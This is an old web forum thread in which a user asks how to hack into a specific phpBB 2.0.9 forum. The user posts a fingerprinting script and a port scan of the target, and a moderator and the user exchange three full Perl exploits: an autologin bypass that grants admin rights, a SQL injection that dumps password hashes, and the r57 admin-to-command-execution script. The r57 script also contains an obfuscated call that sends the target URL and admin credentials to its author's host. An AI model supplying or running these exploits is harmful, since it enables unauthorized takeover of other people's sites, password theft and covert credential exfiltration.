| 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 305 
  Members: 0 
  Total: 305 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  
     
     | 
      
       | 
        
         | 
          
           | CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
 Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
 Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
 Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
 [SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
 [SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
 CVE-2025-59397 - Open Web Analytics SQL Injection
 Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
 Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
 Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
 Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
 Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
 Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
 Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
 
 |  |  |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | hacking a phpbb forum ?? |  |  
	| 
	
		|  Posted: Sun Dec 17, 2006 10:58 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| jade |  | Regular user |  |  
  |  |  |  | Joined: Dec 17, 2006 |  | Posts: 8 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| this is my first post  .. yea am trying hack into a phpbb 2.0.9 forum ....wat are  the different ways to do that.. none of the exploits i used so far  worked   
  	  | Code: |  	  | 
 #!/usr/bin/perl
 
 
 use LWP::Simple;
 
 $host = $ARGV[0];
 $error = "cannot find version\r\n";
 
 if(!$host)
 {
 print "$0 http://<host>/<dir>\r\n";
 exit();
 }
 
 $dothis = get $host."/docs/CHANGELOG.html";
 
 if($dothis =~ /(phpBB) (\d{1})\.(\d{1})\.(\d{1,2})/)
 {
 print "$host => $1 $2.$3.$4$5\r\n";
 }
 else {
 print $error;
 }
 
 | 
 
 
 
 thats code gave me the version number.....
 
 they are running a  Apache/1.3.37 server ..
 
 
 
  	  | Code: |  	  | PORT   STATE SERVICE     VERSION 20/tcp  closed ftp-data
 21/tcp  open ftp       PureFTPd
 22/tcp  closed ssh
 53/tcp  open domain
 80/tcp  open http      Apache httpd 1.3.37
 110/tcp open pop3      cppop pop3d 20.0
 143/tcp open imap      Courier Imapd (released 2005)
 443/tcp open http      Apache httpd 1.3.37
 465/tcp open ssl       OpenSSL
 993/tcp open ssl       OpenSSL
 995/tcp open ssl       OpenSSL
 3306/tcp open mysql      MySQL (unauthorized)
 10000/tcp closed snet-sensor-mgmt
 31337/tcp closed Elite
 31416/tcp closed boinc-client
 32770/tcp closed sometimes-rpc3
 32771/tcp closed sometimes-rpc5
 32772/tcp closed sometimes-rpc7
 32773/tcp closed sometimes-rpc9
 32774/tcp closed sometimes-rpc11
 32775/tcp closed sometimes-rpc13
 32776/tcp closed sometimes-rpc15
 32777/tcp closed sometimes-rpc17
 32778/tcp closed sometimes-rpc19
 32779/tcp closed sometimes-rpc21
 32780/tcp closed sometimes-rpc23
 32786/tcp closed sometimes-rpc25
 32787/tcp closed sometimes-rpc27
 Device type: general purpose
 Running: Linux 2.4.X|2.6.X
 OS details: Linux 2.4.20 - 2.4.22, Linux 2.6.10 - 2.6.11
 | 
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Sun Dec 17, 2006 11:06 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Sm0ke |  | Moderator |  |  
  |  |  |  | Joined: Nov 25, 2006 |  | Posts: 141 |  | Location: Finland |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| try this 
  	  | Code: |  	  | #!/usr/bin/perl -w 
 # phpBB <=2.0.12 session autologin exploit
 # This script uses the vulerability in autologinid variable
 # More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
 #
 # Just gives an user on vulnerable forum administrator rights.
 # You should register the user before using this ;-)
 
 # by Kutas, kutas@mail15.com
 #P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
 # but greets goes to Paisterist who made an exploit for Firefox cookies...
 
 if (@ARGV < 3)
 {
 print q(
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
 i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
 ++++++++++++++++++++++++++++++++++++++++++++++++++++
 );
 exit;
 }
 use strict;
 use LWP::UserAgent;
 
 my $host = $ARGV[0];
 my $path = $ARGV[1];
 my $user = $ARGV[2];
 my $proxy = $ARGV[3];
 my $request = "http://";
 $request .= $host;
 $request .= $path;
 
 
 use HTTP::Cookies;
 my $browser = LWP::UserAgent->new ();
 my $cookie_jar = HTTP::Cookies->new( );
 $browser->cookie_jar( $cookie_jar );
 $cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
 if ( defined $proxy) {
 $proxy =~ s/(http:\/\/)//eg;
 $browser->proxy("http" , "http://$proxy");
 }
 print "++++++++++++++++++++++++++++++++++++\n";
 print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
 
 my $response = $browser->get($request);
 die "Error: ", $response->status_line
 unless $response->is_success;
 
 if($response->content =~ m/phpbbprivmsg/) {
 print "\n Forum is vulnerable!!!\n";
 } else {
 print "Sorry... Not vulnerable"; exit();}
 
 print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
 $response->content =~ /sid=([\w\d]*)/;
 my $sid = $1;
 
 $request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
 $response = $browser->post(
 $request,
 [
 'username' => $user,
 'mode' => 'edit',
 'mode' => 'user',
 'submituser' => 'Look+up+User'
 ],
 );
 die "Error: ", $response->status_line
 unless $response->is_success;
 
 if ($response->content =~ /name="u" value="([\d]*)"/)
 {print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
 else {print "No user $user found..."; exit(); }
 my $uid = $1;
 print "Trying to give user:$user admin status...\n";
 
 $response = $browser->post(
 $request,
 [
 'userlevel' => 'admin',
 'mode' => 'user',
 'adv'=>'',
 'u'=> $uid,
 'submit'=> 'Submit'
 ],
 );
 die "Error: ", $response->status_line
 unless $response->is_success;
 print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";
 
 # milw0rm.com [2005-03-21]
 | 
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Sun Dec 17, 2006 1:29 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| jade |  | Regular user |  |  
  |  |  |  | Joined: Dec 17, 2006 |  | Posts: 8 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| that didnt work.... 
 wat does this exploit do?
 
  	  | Code: |  	  | #!/usr/bin/perl #########################################################
 #   _______ _______ ______   #
 #   |______ |______ |  \  #
 #   ______| |______ |_____/  #
 #                #
 #phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT #
 #Created By SkOd                    #
 #SED security Team                   #
 #http://www.sed-team.be                #
 #skod.uk@gmail.com                   #
 #ISRAEL                        #
 #########################################################
 #google:
 #"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
 #########################################################
 use IO::Socket;
 if (@ARGV < 3){
 print q{
 ############################################################
 # phpBB Style Changer\Viewer MOD SQL injection Exploit #
 #  Tested on phpBB 2.0.19    #
 #   created By SkOd. SED Security Team      #
 ############################################################
 bbstyle.pl [HOST] [PATH] [Target id]
 bbstyle.pl www.host.com /phpbb2/ 2
 ############################################################
 };
 exit;
 }
 $serv = $ARGV[0];
 $dir = $ARGV[1];
 $id = $ARGV[2];
 print "[+]Make Connection\n";
 $serv =~ s/(http:\/\/)//eg;
 $path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id='.$id.'/*';
 $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
 print $socket "GET $path HTTP/1.1\n";
 print $socket "Host: $serv\n";
 print $socket "Accept: */*\n";
 print $socket "Connection: close\n\n";
 print "[+]Connected\n";
 while ($hash = <$socket>){
 $hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
 }
 
 # milw0rm.com [2006-02-05]
 
 | 
 
 i tried it on a phpBB  2.0.19 forum and it says connected...!!???
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Sun Dec 17, 2006 1:57 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Sm0ke |  | Moderator |  |  
  |  |  |  | Joined: Nov 25, 2006 |  | Posts: 141 |  | Location: Finland |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| that exploit is not working i have tryed it 1000 of forums but it just says connected  |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Sun Dec 17, 2006 2:10 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| jade |  | Regular user |  |  
  |  |  |  | Joined: Dec 17, 2006 |  | Posts: 8 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| it doesnt work..   
 tried this exploit tooo...
 
 
 
  	  | Code: |  	  | #!/usr/bin/perl 
 ## r57phpbba2e2.pl - phpBB admin 2 exec exploit
 ## version 2 (based on user_sig_bbcode_uid bug)
 ## tested on 2.0.12 , 2.0.13 , 2.0.19
 ## --------------------------------------------
 ## screen
 ## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
 ## Command for execute or 'exit' for exit # id
 ## uid=80(www) gid=80(www) groups=80(www)
 ## Command for execute or 'exit' for exit # exit
 ## --------------------------------------------
 ## *** surprise included ;)
 ## 20/02/06
 ## 1dt.w0lf
 ## RST/GHC (http://rst.void.ru , http://ghc.ru)
 
 use LWP::UserAgent;
 use Getopt::Std;
 use HTTP::Cookies;
 
 getopts("u:L:P:i:p:o:");
 
 $url = $opt_u;
 $login = $opt_L;
 $password = $opt_P;
 $id = $opt_i || 2;
 $prefix = $opt_p || 'phpbb_';
 $proxy = $opt_o;
 
 if(!$url || !$login || !$password){&usage;}
 
 $|++;
 
 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();
 $xpl->cookie_jar( $cookie_jar );
 $xpl->proxy('http'=>'http://'.$proxy) if $proxy;
 $ids = 'IDS:r57 phpBB2 exploit
 a2e2#20022006|'.$url.'|'.$login.'|'.$password.'|'.$id.'|'.$prefix;
 $res = $xpl->post($url.'login.php',
 [
 "username" => "$login",
 "password" => "$password",
 "autologin" => "on",
 "admin" => "1",
 "login" => "Log in",
 ],"User-Agent" => "$ids");
 $cookie_jar->extract_cookies($res);
 if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; }
 $xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?
 ids='.$ids);
 while ()
 {
 print "Command for execute or 'exit' for exit # ";
 while(<STDIN>)
 {
 $cmd=$_;
 chomp($cmd);
 exit() if ($cmd eq 'exit');
 last;
 }
 &run($cmd);
 }
 
 sub run($)
 {
 $sql = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e',
 user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE
 user_id=".$id.";";
 &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql);
 $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent"
 => "$ids");
 @result = split(/n/,$res->content);
 $data = '';
 $on = $start = $end = 0;
 for (@result)
 {
 if (/_END_/) { $end = 1; last; }
 if ($on) { $data .= $_."n"; }
 if (/_START_/) { $on = 1; $start = 1; }
 }
 if($start&&$end) { print $data."rn"; }
 }
 
 sub phpbb_sql_query($$){
 $res = $xpl->post("$_[0]",
 Content_type => 'form-data',
 Content => [
 perform => 'restore',
 restore_start => 'Start Restore',
 backup_file => [
 undef,
 '0wneeeeedddd',
 Content_type => 'text/plain',
 Content => "$_[1]",
 ],
 ]
 ,"User-Agent" => "$ids");
 }
 
 sub usage()
 {
 &about();
 print "rn Usage: r57phpbba2e2.pl [OPTIONS]rnrn";
 print " Options:rn";
 print " -u [URL] - path to forum e.g. http://site/forum/rn";
 print " -L [login] - admin loginrn";
 print " -P [password] - admin passwordrn";
 print " -i [id] - admin id (optional, default 2)rn";
 print " -p [prefix] - table prefix (optional, default phpbb_)rn";
 print " -o [host:port] - proxy (optional)rn";
 exit();
 }
 
 sub about()
 {
 print "\=-----------------------------------=/rn";
 print "| phpBB admin2exec exploit by RST/GHC |rn";
 print "| version 2 (user_sig_bbcode_uid) |rn";
 print "/=-----------------------------------=\rn";
 return 'http://rst.void.ru';
 }
 
 
 | 
 
 
 am stuck here
 
 
   .wat am i supposed to do now?
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Sun Dec 17, 2006 2:16 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Sm0ke |  | Moderator |  |  
  |  |  |  | Joined: Nov 25, 2006 |  | Posts: 141 |  | Location: Finland |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| You should look exploits before you use them... 
 print " -L [login] - admin loginrn";
 print " -P [password] - admin passwordrn";
 
 you need admin account to use that exploit
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Dec 17, 2006 2:39 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| jade |  | Regular user |  |  
  |  |  |  | Joined: Dec 17, 2006 |  | Posts: 8 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| lol! i thought that script was gona carry out some kindof dictionary attack  .... y do i need an exploit if i am the admin ?  |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> Newbies corner 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |